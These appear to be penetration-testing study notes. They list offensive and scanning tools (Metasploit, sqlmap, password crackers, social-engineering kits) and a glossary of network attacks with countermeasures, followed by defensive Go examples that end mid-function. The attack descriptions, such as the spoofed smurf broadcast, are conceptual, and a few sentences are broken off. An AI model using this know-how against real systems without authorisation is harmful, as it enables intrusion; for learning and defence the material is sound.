Pen Testing Basics
http://todayhacking.com/hacking-guide-to-basic-security-penetration-testing-and-everything-else-hacking/
https://www.cybrary.it/forums/topic/all-in-one-study-guide-for-pentesters-and-forensics/
OverTheWire: Bandit
overthewire.org/wargames/bandit/
What is Penetration Testing?
Penetration testing is a type of security testing used to find security weaknesses in an
application. It is conducted to find the security risks that might be present in the system.
If a system is not secured, then any attacker can disrupt it or gain unauthorized access to that
system. A security risk is normally an accidental error that occurs while developing and
implementing the software: configuration errors, design errors, software bugs, etc.
Why is Penetration Testing Required?
Penetration testing normally evaluates a system’s ability to protect its networks,
applications, endpoints and users from external or internal threats. It also tests whether the
security controls hold up and ensure that only authorized access is possible.
Penetration testing is essential because:
It simulates how an intruder may attack the system, through a white-hat attack.
It helps find the weak areas where an intruder could gain access to the computer’s
features and data.
It helps prevent black-hat attacks and protects the original data.
It estimates the potential impact of an attack on the business.
It provides evidence for why it is important to increase investment in the security
aspects of technology.
When to Perform Penetration Testing?
Penetration testing is an essential activity that needs to be performed regularly to keep a
system functioning securely. In addition, it should be performed whenever:
The security system discovers new threats from attackers.
You add new network infrastructure.
You update your system or install new software.
You relocate your office.
You set up a new end-user program or policy.
Customer Protection: a breach of even a single customer’s data may cause major financial
damage as well as reputational damage. Penetration testing protects organizations that deal
with customers and keeps their data intact.
Penetration testing is a combination of techniques that examine the various issues of a system
and test, analyze and propose solutions for them. It is based on a structured procedure that
performs penetration testing step by step.
How is it Performed?
Step #1. It starts with a list of vulnerabilities/potential problem areas that would cause a
security breach of the system.
Step #2. If possible, this list of items is ranked in order of priority/criticality.
Step #3. Penetration tests that attack your system from both within the network and from
outside (externally) are devised and run to determine whether data, network, server or
website can be accessed without authorization.
Step #4. If unauthorized access is possible, then the system has to be corrected and the
series of steps re-run until the problem area is fixed.
Who Performs Pen-testing?
Testers, network specialists and security consultants perform pen-testing.
Note: It is important to note that pen-testing is not the same as vulnerability testing. The
intention of vulnerability testing is just to identify the potential problems, whereas pen-testing
attempts to attack (exploit) those problems.
The good news is that you do not have to start the process by yourself: a number of tools
are already available on the market. Wondering why tools?
Even though you design the test (what to attack and how you can leverage it), many tools
on the market hit the problem areas and collect data quickly, which in turn enables
effective security analysis of the system.
Before we look into the details of the tools, what they do, where you can get them, etc., I would
like to point out that the tools you use for pen-testing can be classified into two kinds. In simple
words, they are scanners and attackers. This is because, by definition, pen-testing is exploiting
the weak spots. So some software/tools will show you the weak spots, and some both show and
attack. Strictly speaking, the ‘show-ers’ are not pen-testing tools, but they are indispensable to
its success.
#1) Netsparker
Netsparker is a highly accurate automated scanner that will identify vulnerabilities such as SQL Injection
and Cross-site Scripting in web applications and web APIs. Netsparker uniquely verifies the identified
vulnerabilities, proving they are real and not false positives.
Therefore you do not have to waste hours manually verifying the identified vulnerabilities once a scan is
finished.
It is available as a Windows software and an online service.
Download link: Click here to learn more about Netsparker
**************
#2) Acunetix
Acunetix is a fully automated web vulnerability scanner that detects and reports on over 4500 web
application vulnerabilities including all variants of SQL Injection and XSS.
It complements the role of a penetration tester by automating tasks that can take hours to test for
manually, delivering accurate results with no false positives at top speed.
Acunetix fully supports HTML5, JavaScript and Single-page applications as well as CMS systems. It
includes advanced manual tools for penetration testers and integrates with popular Issue Trackers and
WAFs.
Download link: Click here to learn more about Acunetix
#3) Metasploit
This is the most advanced and popular framework that can be used for pen-testing. It is based on the
concept of an ‘exploit’, code that bypasses the security measures and enters a certain system. Once in,
it runs a ‘payload’, code that performs operations on the target machine, thus creating a complete
framework for penetration testing.
It can be used on web applications, networks, servers, etc. It has a command-line interface and a clickable
GUI, and works on Linux, Apple Mac OS X and Microsoft Windows. Although a few free limited trials
are available, this is a commercial product.
Download link: Metasploit Download
**************
#4) Wireshark
This is basically a network protocol analyzer –popular for providing the minutest details about your
network protocols, packet information, decryption etc. It can be used on Windows, Linux, OS X, Solaris,
FreeBSD, NetBSD, and many other systems. The information that is retrieved via this tool can be
viewed through a GUI or the TTY-mode TShark utility. You can get your own free version of the tool
from the link below.
Download link: Wireshark download
**************
#5) w3af
#6) Kali Linux
Kali Linux is an open source project that is maintained by Offensive Security. A few prime features of Kali
Linux include accessibility, full customisation of Kali ISOs, live USB with multiple persistence
stores, full disk encryption, running on Android, disk encryption on Raspberry Pi 2, etc.
Tool listings, metapackages and version tracking are some of the penetration testing features present in
Kali Linux. For more information and to download it, visit the page below.
Download link: Kali Linux download
**************
#7) Nessus
Nessus is also a scanner, and one worth keeping an eye on. It is one of the most robust vulnerability
identification tools available. It specializes in compliance checks, sensitive data searches, IP scans, website
scanning, etc., and aids in finding the ‘weak spots’.
It works well in most environments. For more information and to download it, visit the
page below.
Download link: Nessus download
**************
#8) Burpsuite
Burp Suite is also essentially a scanner (with a limited “Intruder” tool for attacks), although many security
testing specialists swear that pen-testing without this tool is unimaginable. The tool is not free, but it is
very cost effective.
Take a look at it on the download page below. Its strengths are its intercepting proxy,
crawling of content and functionality, web application scanning, etc. You can use it on Windows, Mac
OS X and Linux.
Download link: Burp suite download
**************
#9) Cain & Abel
If cracking encrypted passwords or network keys is what you need, then Cain & Abel is the tool
for you.
It uses network sniffing, dictionary, brute-force and cryptanalysis attacks, cache uncovering and routing
protocol analysis to achieve this. Information about this free-to-use tool is on the page
below. It is exclusively for Microsoft operating systems.
Download link: Cain & Abel download
**************
#10) Zed Attack Proxy (ZAP)
ZAP is a completely free scanner and security vulnerability finder for web applications. ZAP
includes an intercepting proxy, a variety of scanners, spiders, etc.
It works on most platforms. For more information and to download it, visit the page below.
Download link: ZAP download
**************
#11) John The Ripper
Another password cracker in line is John the Ripper. This tool works in most environments,
although it is primarily for UNIX systems. It is considered one of the fastest tools in this genre.
Password hashing and strength-checking code are also made available for integration into your own
software, which I think is quite unique. This tool comes in a pro and a free form. Check out its site to
obtain the software.
Download link: John the Ripper download
#12) Retina
As opposed to a particular application or server, Retina targets the entire environment at a
company. It comes as a package called Retina Community.
It is a commercial product and is more of a vulnerability management tool than a pen-testing tool. It
works by running scheduled assessments and presenting results. Check out more about this package on the
page below.
Download link: Retina download
#13) Sqlmap
Sqlmap is another good open source pen-testing tool. It is mainly used for detecting and exploiting
SQL injection issues in an application and taking over database servers.
It has a command-line interface. Linux, Apple Mac OS X and Microsoft Windows
are its supported platforms. All versions of this tool are free to download. Check out the page below for
details.
Download link: Sqlmap download
#14) Canvas
Immunity’s CANVAS is a widely used tool that contains more than 400 exploits and multiple payload
options. It is useful for web applications, wireless systems, networks, etc.
It has a command-line and a GUI interface, and works on Linux, Apple Mac OS X and Microsoft
Windows. It is not free of charge; more information can be found on the page below.
Download link: Canvas download
#15) Social Engineer Toolkit
The Social-Engineer Toolkit (SET) is unique in that its attacks are targeted at the human
element rather than the system. It has features that let you send emails, Java applets, etc. containing
the attack code. It goes without saying that this tool is to be used very carefully and only for ‘white-hat’
reasons.
It has a command-line interface and works on Linux, Apple Mac OS X and Microsoft Windows. It is open
source and can be found on the page below.
Download link: SET download
#16) Sqlninja
Sqlninja, as the name indicates, is all about taking over the DB server using SQL injection in any
environment. The product itself claims not to be very stable, yet its popularity indicates how robust it
already is at exploiting DB-related vulnerabilities.
It has a command-line interface and works on Linux and Apple Mac OS X, but not on Microsoft Windows.
It is open source and can be found on the page below.
Download link: Sqlninja download
#17) Nmap
Nmap (“Network Mapper”), though not necessarily a pen-testing tool, is a must-have tool for ethical hackers.
It is a very popular tool that predominantly aids in understanding the characteristics of a
target network.
The characteristics include hosts, services, OS, packet filters/firewalls, etc. It works in most
environments and is open source.
Download link: Nmap download
#18) BeEF
BeEF stands for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the
web browser: it takes advantage of the fact that an open web browser is the window (or
crack) into a target system and launches its attacks from that point.
It has a GUI, works on Linux, Apple Mac OS X and Microsoft Windows, is open source
and can be found on the page below.
Download link: BeEF download
#19) Dradis
Dradis is an open source framework (a web application) that helps maintain the information
shared among the participants of a pen-test. The information collected helps to understand what has been
done and what still needs to be done.
It achieves this by means of plugins that read and collect data from network scanning tools like
Nmap, w3af, Nessus, Burp Suite, Nikto and many more. It has a GUI, works on Linux, Apple
Mac OS X and Microsoft Windows, is open source and can be found on the page below.
Download link: Dradis download
**************
Additional Tools for Security and Pen-Testing
The list above is a long one, but it is not the end. A few more tools and software have been
gaining momentum recently.
Here they are:
20) Ettercap: A network and host analysis tool that provides sniffing and protocol dissection
among other things. More info here.
21) Veracode: Works with the code development process to ensure security and minimize
vulnerabilities at the source level. Check here.
22) Aircrack-ng: Captures data packets and uses them for recovery of 802.11 WEP and
WPA-PSK keys. Download here.
23) Arachni: A Ruby framework that helps in analyzing web application security. It
performs a meta-analysis on the HTTP responses it receives during an audit and presents
various insights into how secure the application is. Download here.
24) IBM AppScan: As the name indicates, this is a scanner that identifies problem areas and
suggests remedial actions. Download here.
25) Nagios: This software monitors the entire environment, including servers,
applications and network, the whole infrastructure, and alerts when a potential problem is
detected. Download here.
26) WebScarabNG: This tool uses the HTTP/HTTPS requests between the browser and the server
to understand, capture and sometimes modify the parameters that are part of the communication
between the two parties. Download here.
27) Maltego: A unique tool that focuses on showing/highlighting the relationships between
people, sites, infrastructure, etc. in order to identify inconsistent/incorrect connections. Download
here.
28) IronWASP: A customizable scanner creator for web applications using Python/Ruby
scripting. Download here.
29) HconSTF: With this tool you can create your own web exploits and decoys for
exploiting vulnerabilities in the areas of passwords, databases, network, etc. Download here.
30) OpenVAS: Stands for Open Vulnerability Assessment System. Well, the name says it all. For
more info, check here.
31) Secunia PSI: A personal software inspector that will keep your system secure when
installed. Try it here.
We hope this piques your interest in the pen-testing field and provides you with the necessary
information to get started. A word of caution: remember to wear your ‘white hat’, because with
great power comes great responsibility, and we don’t want to be the ones to misuse it. :-)
Vulnerability Scanning or Pen Testing?
Vulnerability scanning lets the user find out the known weaknesses in the application and
defines methods to fix them and improve the overall security of the application. It basically finds
out whether security patches are installed and whether the systems are properly configured to make
attacks difficult.
Pen tests mainly simulate real attacks on live systems and help the user find out whether the system can be
accessed by unauthorized users and, if so, what damage can be caused and to which data.
Hence, vulnerability scanning is a detective control method which suggests ways to
improve the security program and ensure known weaknesses do not resurface, whereas a pen test is
a preventive control method which gives an overall view of the system’s existing security
layer.
Both methods have their importance, but which one to use depends on what is really expected
from the testing.
As testers, it is imperative to be clear on the purpose of the testing before we jump into
testing. If you are clear on the objective, you can very well define if you need to do a
vulnerability scan or pen testing.
If you look at current market demand, there has been a sharp increase in mobile usage, which
is becoming a major target for attacks. Accessing websites through mobile devices is prone to more
frequent attacks and hence to data compromise.
Penetration testing thus becomes very important in ensuring we build a secure system which can be
used without worries of hacking or data loss.
Test Scenarios:
Listed below are some of the test scenarios which can be tested as part of Web Application
Penetration Testing (WAPT):
1. Cross Site Scripting
2. SQL Injection
3. Broken authentication and session management
4. File Upload flaws
5. Caching Servers Attacks
6. Security Misconfigurations
7. Cross Site Request Forgery
8. Password Cracking
Even though I have listed them, testers should not blindly create their test methodology based
on the conventional standards above.
The answer is no, because eCommerce works on a very different platform and technology when
compared to other websites. To make pen testing of an eCommerce website effective,
testers should design a methodology covering flaws in Order Management, Coupon and Reward
Management, Payment Gateway Integration and Content Management System Integration.
So, before you decide on the methodology, be very sure what types of website are expected to be
tested and which method will help in finding the most vulnerabilities.
This helps in finding out whether vulnerabilities exist within the corporate firewall.
We tend to believe attacks can only happen externally, and many a time the internal pentest is
overlooked or not given much importance.
Testing is mainly done by accessing the environment without proper credentials and identifying if an
Testers behave like hackers who are not much aware of the internal system.
To simulate such attacks, testers are given the IP of the target system and no other
information. They are required to search and scan public web pages to find out information about the
target hosts and then compromise the hosts found.
Scope definition – This is same like our functional testing where we define the scope of our
testing before starting our test efforts.
Availability of Documentation to Testers – Ensure testers have all the required documents,
such as documents detailing the web architecture, integration points, web services integration,
etc. The tester should be aware of HTTP/HTTPS protocol basics, the web application
architecture and ways of intercepting traffic.
Determining the Success Criteria – Unlike our functional test cases, where we can derive
expected results from user requirements/functional requirements, pen testing works on a
different model. The Success criteria or the test case passing criteria needs to be defined and
approved.
Reviewing the test results from the Previous Testing – If prior testing was ever done, it is
good to review the test results to understand what vulnerabilities existed in the past and what
remediation was taken to resolve. This always gives a better picture to the testers.
Understanding environment – Testers should gain knowledge about the environment before
starting testing. This step should give them an understanding of the firewalls or other
security controls that would need to be disabled to perform the testing. The browser to
be tested should be converted into an attack platform, usually by changing its proxy settings.
Ensure to run a test with different user roles – Testers should run tests with
users having different roles, since the system may behave differently for users
with different privileges.
Awareness on how to handle Post-Exploitation – Testers must follow the Success Criteria
defined as part of Phase 1 to report any exploitation, and they should follow the defined
process for reporting vulnerabilities found during testing. This step mainly involves the tester
finding out what needs to be done after they have found that the system has been
compromised.
Generation of Test Reports – Any testing done without proper reporting doesn’t help the
organization much, and the same is true for penetration testing of web applications. To ensure
the test results are properly shared with all stakeholders, testers should create proper reports
with details of the vulnerabilities found, the methodology used for testing, the severity and the
location of each problem found.
#3) Post Execution Phase (After Testing):
Once the testing is complete and test reports shared with all concerned teams, the following list
should be worked upon by all –
Suggest remediation – Pen Testing shouldn’t just end by identifying vulnerabilities. The
concerned team including a QA member should review the findings reported by Testers and
then discuss the remediation.
Retest Vulnerabilities – After the remediation is implemented, testers should
retest to confirm that the fixed vulnerabilities no longer appear.
Cleanup – As part of the Pentest, testers make changes to the proxy settings, so clean up
should be done and all changes reverted back.
PENETRATION TESTING STAGES
The pen testing process can be broken down into five stages.
The results of the penetration test are then compiled into a report detailing:
o Specific vulnerabilities that were exploited
o Sensitive data that was accessed
o The amount of time the pen tester was able to remain in the system undetected
This information is analyzed by security personnel to help configure an enterprise’s WAF
settings and other application security solutions to patch vulnerabilities and protect
against future attacks.
THREAT GLOSSARY
A cyber attack is any type of offensive action that targets computer information systems,
infrastructures, computer networks or personal computer devices, using various methods to steal,
alter or destroy data or information systems.
TCP SYN flood attack
In this attack, an attacker exploits the use of the buffer space during a Transmission
Control Protocol (TCP) session initialization handshake. The attacker’s device floods the
target system’s small in-process queue with connection requests, but it does not respond
when the target system replies to those requests. This causes the target system to time out
while waiting for the response from the attacker’s device, which makes the system crash
or become unusable when the connection queue fills up.
There are a few countermeasures to a TCP SYN flood attack:
Place servers behind a firewall configured to stop inbound SYN packets.
Increase the size of the connection queue and decrease the timeout on open connections.
Teardrop attack
This attack causes the length and fragmentation offset fields in sequential Internet
Protocol (IP) packets to overlap one another on the attacked host; the attacked system
attempts to reconstruct packets during the process but fails. The target system then
becomes confused and crashes.
If users don’t have patches to protect against this DoS attack, disable SMBv2 and block
ports 139 and 445.
Smurf attack
This attack involves using IP spoofing and the ICMP to saturate a target network with
traffic. This attack method uses ICMP echo requests targeted at broadcast IP addresses.
These ICMP requests originate from a spoofed “victim” address. For instance, if the
intended victim address is 10.0.0.10, the attacker would spoof an ICMP echo request
from 10.0.0.10 to the broadcast address 10.255.255.255. This request would go to all IPs
in the range, with all the responses going back to 10.0.0.10, overwhelming the network.
This process is repeatable, and can be automated to generate huge amounts of network
congestion.
To protect your devices from this attack, you need to disable IP-directed broadcasts at the
routers. This will prevent the ICMP echo broadcast request at the network devices.
Another option would be to configure the end systems to keep them from responding to
ICMP packets from broadcast addresses.
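As an added example (not from the original page), here is a small Go detector for the smurf trigger described above: it computes the directed-broadcast address of each monitored network and flags ICMP echo requests sent to it, whose source address is the spoofed victim. The packet records and the monitored network are constructed sample data.

```go
package main

import (
	"fmt"
	"net"
)

// Packet is a constructed, minimal view of an IPv4/ICMP packet: only the
// fields the smurf check needs.
type Packet struct {
	Src      string
	Dst      string
	ICMPType int // 8 = echo request, 0 = echo reply
}

// SmurfFinding records one amplification trigger seen on the wire.
type SmurfFinding struct {
	SpoofedVictim string // source of the request: where every reply will go
	Broadcast     string
}

// DirectedBroadcast returns the directed-broadcast address of an IPv4 CIDR
// network (all host bits set), e.g. 10.0.0.0/8 -> 10.255.255.255.
func DirectedBroadcast(cidr string) (string, error) {
	_, ipnet, err := net.ParseCIDR(cidr)
	if err != nil {
		return "", err
	}
	ip := ipnet.IP.To4()
	if ip == nil {
		return "", fmt.Errorf("IPv4 network required: %s", cidr)
	}
	mask := ipnet.Mask
	if len(mask) == net.IPv6len {
		mask = mask[12:]
	}
	bcast := make(net.IP, net.IPv4len)
	for i := range bcast {
		bcast[i] = ip[i] | ^mask[i]
	}
	return bcast.String(), nil
}

// DetectSmurf flags ICMP echo requests addressed to the directed-broadcast
// address of any monitored network. Normal hosts never need to send one, and
// the request's source is the address that will be flooded with replies,
// i.e. the spoofed victim. Replies are ignored.
func DetectSmurf(pkts []Packet, monitored []string) ([]SmurfFinding, error) {
	bcasts := map[string]bool{}
	for _, c := range monitored {
		b, err := DirectedBroadcast(c)
		if err != nil {
			return nil, err
		}
		bcasts[b] = true
	}
	var findings []SmurfFinding
	for _, p := range pkts {
		if p.ICMPType == 8 && bcasts[p.Dst] {
			findings = append(findings, SmurfFinding{SpoofedVictim: p.Src, Broadcast: p.Dst})
		}
	}
	return findings, nil
}

// SampleTraffic is a constructed capture: a normal ping exchange plus the
// trigger from the text (echo request "from" 10.0.0.10 to 10.255.255.255).
var SampleTraffic = []Packet{
	{Src: "10.0.0.5", Dst: "10.0.0.1", ICMPType: 8},
	{Src: "10.0.0.1", Dst: "10.0.0.5", ICMPType: 0},
	{Src: "10.0.0.10", Dst: "10.255.255.255", ICMPType: 8},
	{Src: "10.0.0.7", Dst: "10.0.0.10", ICMPType: 0}, // one of the amplified replies
}

func main() {
	findings, err := DetectSmurf(SampleTraffic, []string{"10.0.0.0/8"})
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("smurf trigger: echo request to %s spoofed from %s\n", f.Broadcast, f.SpoofedVictim)
	}
}
```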
Ping of death attack
This type of attack uses IP packets to ‘ping’ a target system with an IP size over the
maximum of 65,535 bytes. IP packets of this size are not allowed, so the attacker fragments
the IP packet. Once the target system reassembles the packet, it can experience buffer
overflows and other crashes.
Ping of death attacks can be blocked by using a firewall that will check fragmented IP
packets for maximum size.
Botnets
Botnets are the millions of systems infected with malware under hacker control in order
to carry out DDoS attacks. These bots or zombie systems are used to carry out attacks
against the target systems, often overwhelming the target system’s bandwidth and
processing capabilities. These DDoS attacks are difficult to trace because botnets are
located in differing geographic locations.
Botnets can be mitigated by:
RFC3704 filtering, which will deny traffic from spoofed addresses and help ensure that
traffic is traceable to its correct source network. For example, RFC3704 filtering will
drop packets from bogon list addresses.
Black hole filtering, which drops undesirable traffic before it enters a protected network.
When a DDoS attack is detected, the BGP (Border Gateway Protocol) host should send
routing updates to ISP routers so that they route all traffic heading to victim servers to a
null0 interface at the next hop.
2. Man-in-the-middle (MitM) attack
A MitM attack occurs when a hacker inserts themselves between the communications of a
client and a server. Here are some common types of man-in-the-middle attacks:
Session hijacking
In this type of MitM attack, an attacker hijacks a session between a trusted client and
network server. The attacking computer substitutes its IP address for the trusted client
while the server continues the session, believing it is communicating with the client. For
instance, the attack might unfold like this:
1. A client connects to a server.
2. The attacker’s computer gains control of the client.
3. The attacker’s computer disconnects the client from the server.
4. The attacker’s computer replaces the client’s IP address with its own IP address and
spoofs the client’s sequence numbers.
5. The attacker’s computer continues dialog with the server and the server believes it is still
communicating with the client.
IP Spoofing
IP spoofing is used by an attacker to convince a system that it is communicating with a
known, trusted entity and provide the attacker with access to the system. The attacker
sends a packet with the IP source address of a known, trusted host instead of its own IP
source address to a target host. The target host might accept the packet and act upon it.
Replay
A replay attack occurs when an attacker intercepts and saves old messages and then tries
to send them later, impersonating one of the participants. This type can be easily
countered with session timestamps or a nonce (a random number or string that changes
with time).
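An added example, not part of the original page, showing the timestamp-plus-nonce countermeasure just described as a receiver-side check in Go. The message format, the shared HMAC key and the 30-second acceptance window are assumptions made for the demo.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strconv"
	"time"
)

// Message is a constructed request format: a body, the sender's timestamp, a
// random nonce and an HMAC over all three so that none of them can be altered.
type Message struct {
	Body      string
	Timestamp int64 // Unix seconds
	Nonce     string
	MAC       string
}

// Verifier is the receiving side. It remembers nonces seen inside the
// acceptance window, so a saved message cannot be presented a second time.
type Verifier struct {
	key    []byte
	window time.Duration
	seen   map[string]int64 // nonce -> timestamp of first acceptance
	now    func() time.Time // injectable clock
}

func NewVerifier(key []byte, window time.Duration, now func() time.Time) *Verifier {
	return &Verifier{key: key, window: window, seen: map[string]int64{}, now: now}
}

func mac(key []byte, body string, ts int64, nonce string) string {
	h := hmac.New(sha256.New, key)
	h.Write([]byte(strconv.FormatInt(ts, 10) + "|" + nonce + "|" + body))
	return hex.EncodeToString(h.Sum(nil))
}

// Sign builds a fresh message carrying a random 16-byte nonce.
func Sign(key []byte, body string, now time.Time) (Message, error) {
	n := make([]byte, 16)
	if _, err := rand.Read(n); err != nil {
		return Message{}, err
	}
	nonce, ts := hex.EncodeToString(n), now.Unix()
	return Message{Body: body, Timestamp: ts, Nonce: nonce, MAC: mac(key, body, ts, nonce)}, nil
}

var (
	ErrBadMAC   = errors.New("MAC mismatch: message altered or wrong key")
	ErrStale    = errors.New("timestamp outside the acceptance window")
	ErrReplayed = errors.New("nonce already seen: replay")
)

// Accept returns nil exactly once per genuine message. Order matters: the MAC
// is checked first so forged messages cannot pollute the nonce cache, and the
// timestamp is checked before the cache so expired nonces can be forgotten
// without letting stale messages through.
func (v *Verifier) Accept(m Message) error {
	if !hmac.Equal([]byte(mac(v.key, m.Body, m.Timestamp, m.Nonce)), []byte(m.MAC)) {
		return ErrBadMAC
	}
	now, win := v.now().Unix(), int64(v.window/time.Second)
	if m.Timestamp < now-win || m.Timestamp > now+win {
		return ErrStale
	}
	for n, ts := range v.seen { // forget nonces that can no longer pass the window check
		if ts < now-win {
			delete(v.seen, n)
		}
	}
	if _, dup := v.seen[m.Nonce]; dup {
		return ErrReplayed
	}
	v.seen[m.Nonce] = m.Timestamp
	return nil
}

func main() {
	key := []byte("constructed-shared-secret")
	v := NewVerifier(key, 30*time.Second, time.Now)
	m, err := Sign(key, "transfer 10 to bob", time.Now())
	if err != nil {
		panic(err)
	}
	fmt.Println("first delivery:", v.Accept(m)) // <nil>
	fmt.Println("replayed copy:", v.Accept(m))  // nonce already seen: replay
}
```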
Currently, there is no single technology or configuration to prevent all MitM attacks.
Generally, encryption and digital certificates provide an effective safeguard against MitM
attacks, assuring both the confidentiality and integrity of communications. But a man-in-
the-middle attack can be injected into the middle of communications in such a way that
encryption will not help. For example, attacker “A” intercepts the public key of person “P”
and substitutes it with his own public key. Then anyone wanting to send an encrypted
message to P using P’s public key is unknowingly using A’s public key. Therefore, A can
read the message intended for P and then send the message on to P, encrypted with P’s real
public key, and P will never notice that the message was compromised. In addition, A
could also modify the message before resending it to P. As you can see, P is using
encryption and thinks that his information is protected, but it is not, because of the MitM
attack.
So, how can you make sure that P’s public key belongs to P and not to A? Certificate
authorities and hash functions were created to solve this problem. When person 2 (P2)
wants to send a message to P, and P wants to be sure that A will not read or modify the
message and that the message actually came from P2, the following method must be
used:
1. P2 creates a symmetric key and encrypts it with P’s public key.
2. P2 sends the encrypted symmetric key to P.
3. P2 computes a hash of the message and digitally signs it.
4. P2 encrypts his message and the message’s signed hash using the symmetric key and
sends the entire thing to P.
5. P is able to recover the symmetric key from P2 because only he has the private key to
decrypt it.
6. P, and only P, can decrypt the symmetrically encrypted message and signed hash because
he has the symmetric key.
7. He is able to verify that the message has not been altered because he can compute the
hash of the received message and compare it with the digitally signed one.
8. P is also able to prove to himself that P2 was the sender because only P2 can sign the
hash so that it verifies with P2’s public key.
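The eight steps above carried out in Go, as an added example that is not from the original page. The page names no algorithms, so RSA-OAEP for wrapping the symmetric key, RSA-PSS over a SHA-256 hash for the signature and AES-GCM as the symmetric cipher are my choices; the keys and message are generated for the demo.

```go
package main

import (
	"crypto"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// Envelope is what P2 sends to P: the symmetric key wrapped with P's public key (steps 1-2) and "message || signature" sealed under that key (steps 3-4).
type Envelope struct {
	WrappedKey []byte
	Nonce      []byte
	Sealed     []byte
	SigLen     int
}

// GenKey makes a 2048-bit RSA key pair for the demo (panics on failure).
func GenKey() *rsa.PrivateKey {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	return k
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Seal is P2's side, steps 1-4 of the method above.
func Seal(msg []byte, senderPriv *rsa.PrivateKey, recipientPub *rsa.PublicKey) (Envelope, error) {
	// Step 1: fresh symmetric key, encrypted with P's public key (RSA-OAEP).
	symKey := make([]byte, 32)
	if _, err := rand.Read(symKey); err != nil {
		return Envelope{}, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, recipientPub, symKey, nil)
	if err != nil {
		return Envelope{}, err
	}
	// Step 3: hash the message and sign the hash with P2's private key (RSA-PSS).
	digest := sha256.Sum256(msg)
	sig, err := rsa.SignPSS(rand.Reader, senderPriv, crypto.SHA256, digest[:], nil)
	if err != nil {
		return Envelope{}, err
	}
	// Step 4: encrypt message and signed hash under the symmetric key (AES-GCM).
	gcm, err := newGCM(symKey)
	if err != nil {
		return Envelope{}, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return Envelope{}, err
	}
	body := append(append([]byte{}, msg...), sig...)
	return Envelope{WrappedKey: wrapped, Nonce: nonce, Sealed: gcm.Seal(nil, nonce, body, nil), SigLen: len(sig)}, nil
}

// Open is P's side, steps 5-8: the message comes back only if it decrypts and its signed hash verifies under P2's public key.
func Open(env Envelope, recipientPriv *rsa.PrivateKey, senderPub *rsa.PublicKey) ([]byte, error) {
	// Step 5: only P's private key can unwrap the symmetric key.
	symKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, recipientPriv, env.WrappedKey, nil)
	if err != nil {
		return nil, fmt.Errorf("unwrap key: %w", err)
	}
	gcm, err := newGCM(symKey) // Step 6: decrypt message and signed hash with the symmetric key.
	if err != nil {
		return nil, err
	}
	plain, err := gcm.Open(nil, env.Nonce, env.Sealed, nil)
	if err != nil {
		return nil, fmt.Errorf("decrypt: %w", err)
	}
	if env.SigLen <= 0 || env.SigLen > len(plain) {
		return nil, fmt.Errorf("malformed envelope")
	}
	msg, sig := plain[:len(plain)-env.SigLen], plain[len(plain)-env.SigLen:]
	// Steps 7-8: recompute the hash and verify the signature under P2's public key: unaltered, and from P2 rather than A.
	digest := sha256.Sum256(msg)
	if err := rsa.VerifyPSS(senderPub, crypto.SHA256, digest[:], sig, nil); err != nil {
		return nil, fmt.Errorf("signature: %w", err)
	}
	return msg, nil
}

func main() {
	p, p2 := GenKey(), GenKey() // P (recipient) and P2 (sender)
	env, _ := Seal([]byte("meet at noon"), p2, &p.PublicKey)
	msg, err := Open(env, p, &p2.PublicKey)
	fmt.Printf("%q %v\n", msg, err)
}
```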
3. Phishing and spear phishing attacks
A phishing attack is the practice of sending emails that appear to be from trusted sources
with the goal of gaining personal information or influencing users to do something. It
combines social engineering and technical trickery. It could involve an attachment to an
email that loads malware onto your computer. It could also be a link to an illegitimate
website that can trick you into downloading malware or handing over your personal
information.
Spear phishing is a very targeted type of phishing activity. Attackers take the time to
conduct research into targets and create messages that are personal and relevant. Because
of this, spear phishing can be very hard to identify and even harder to defend against. One
of the simplest ways that a hacker can conduct a spear phishing attack is email spoofing,
which is when the information in the “From” section of the email is falsified, making it
appear as if it is coming from someone you know, such as your management or your
partner company. Another technique that scammers use to add credibility to their story is
website cloning — they copy legitimate websites to fool you into entering personally
identifiable information (PII) or login credentials.
To reduce the risk of being phished, you can use these techniques:
Critical thinking — Do not accept that an email is the real deal just because you’re busy
or stressed or you have 150 other unread messages in your inbox. Stop for a minute and
analyze the email.
Hovering over the links — Move your mouse over the link, but do not click it! Just let
your mouse cursor hover over the link and see where it would actually take you. Apply
critical thinking to decipher the URL.
Analyzing email headers — Email headers define how an email got to your address.
The “Reply-to” and “Return-Path” parameters should lead to the same domain as is stated
in the email.
Sandboxing — You can test email content in a sandbox environment, logging activity
from opening the attachment or clicking the links inside the email.
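An added example (not from the original page) of the header-analysis rule above as Go code: it parses a constructed spear-phishing message and reports when the Reply-To or Return-Path domain differs from the From domain. All addresses and domains are made up.

```go
package main

import (
	"fmt"
	"net/mail"
	"strings"
)

// constructedMail is a made-up spear-phishing message: the visible From claims
// the partner company, but Reply-To and Return-Path point elsewhere.
const constructedMail = `Return-Path: <bounce@mail-relay.example.net>
From: "Accounts Payable" <ap@partner-company.example>
Reply-To: <ap-partner-company@free-mail.example>
To: <finance@victim-corp.example>
Subject: Updated bank details for invoice 4471

Please use the attached details for this month's payment.
`

// domainOf extracts the lower-cased domain from a header that holds an
// address, or "" if the header is absent or unparsable.
func domainOf(h mail.Header, key string) string {
	raw := h.Get(key)
	if raw == "" {
		return ""
	}
	addr, err := mail.ParseAddress(raw)
	if err != nil {
		return ""
	}
	at := strings.LastIndex(addr.Address, "@")
	if at < 0 {
		return ""
	}
	return strings.ToLower(addr.Address[at+1:])
}

// CheckHeaders applies the rule from the text: Reply-To and Return-Path should
// lead to the same domain as From. Each mismatch is returned as a finding; an
// empty result means the three agree (or the optional headers are absent).
func CheckHeaders(rawMail string) ([]string, error) {
	msg, err := mail.ReadMessage(strings.NewReader(rawMail))
	if err != nil {
		return nil, err
	}
	from := domainOf(msg.Header, "From")
	if from == "" {
		return nil, fmt.Errorf("no usable From header")
	}
	var findings []string
	for _, key := range []string{"Reply-To", "Return-Path"} {
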